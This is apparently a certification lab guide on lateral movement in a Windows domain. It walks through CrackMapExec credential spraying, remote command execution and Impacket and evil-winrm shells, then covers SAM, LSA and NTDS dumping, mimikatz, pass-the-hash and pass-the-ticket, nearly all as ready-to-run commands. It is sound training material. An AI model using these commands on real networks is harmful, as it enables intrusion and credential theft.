Skip to content

Latest commit

 

History

History
124 lines (86 loc) · 3.26 KB

File metadata and controls

124 lines (86 loc) · 3.26 KB

Lab 34 — Lateral Movement with CrackMapExec and Impacket

Exam objective: 5.2 Lateral movement — pivoting, WMI, WinRM, SMB/RDP/SSH, LDAP, FTP, Telnet, HTTP(S); tools CME, Impacket, PsExec, mimikatz.

In this lab you will use CrackMapExec / NetExec and the Impacket suite to move laterally across a Windows network using captured credentials. Re-use the AD lab from Lab 26.


Step 1 — Enumerate the network

Reachable hosts:

crackmapexec smb 10.0.0.0/24

Output gives OS, hostname, signing status. Test the captured svc_sql : Summer2025 everywhere:

crackmapexec smb 10.0.0.0/24 -u svc_sql -p 'Summer2025'

Look for Pwn3d! — that means local admin.


Step 2 — Enumerate shares and users

crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --shares
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --users
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --pass-pol
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --loggedon-users

Step 3 — Execute commands via SMB

crackmapexec smb <ip> -u svc_sql -p 'Summer2025' -x 'whoami /all'
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --exec-method smbexec -x 'ipconfig'

Methods: smbexec, wmiexec, atexec, mmcexec — try each if one is blocked.


Step 4 — Full shell with PsExec / WMI / WinRM

impacket-psexec corp.local/svc_sql:Summer2025@<ip>
impacket-wmiexec corp.local/svc_sql:Summer2025@<ip>
impacket-atexec  corp.local/svc_sql:Summer2025@<ip> 'whoami'
evil-winrm -i <ip> -u svc_sql -p 'Summer2025'

WinRM (5985/5986) is the cleanest — evil-winrm gives a full PowerShell shell with file upload and Invoke-Binary for reflective loading.


Step 5 — Dump credentials from the new host

crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --sam
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --lsa
crackmapexec smb <ip> -u svc_sql -p 'Summer2025' --ntds         # only on DC

Or from an interactive session:

evil-winrm> upload mimikatz.exe
evil-winrm> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Step 6 — Pass-the-Hash

crackmapexec smb <ip> -u Administrator -H <NT-hash> --local-auth
impacket-psexec -hashes :<NT-hash> corp.local/Administrator@<ip>

If signing isn't enforced, Pass-the-Hash works as if you had the password.


Step 7 — Pass-the-Ticket

Convert a TGT/TGS into a usable Kerberos ticket:

export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass corp.local/svc_sql@target.corp.local

Step 8 — Service discovery shorthand

Port Tool
22 SSH ssh, sshpass
23 Telnet telnet, nc
80/443 HTTP curl, httpx
135 RPC impacket-rpcdump
139/445 SMB crackmapexec, smbclient
389/636 LDAP ldapsearch, windapsearch
1433 MSSQL impacket-mssqlclient
3306 MySQL mysql client
3389 RDP xfreerdp, rdesktop
5985/5986 WinRM evil-winrm

What you learned

  • How CrackMapExec / NetExec sprays creds across a subnet to find admin reuse.
  • Five Impacket execution methods (psexec, wmiexec, atexec, smbexec, mssqlclient).
  • Pass-the-Hash and Pass-the-Ticket workflows.
  • The lateral-movement port → tool cheatsheet.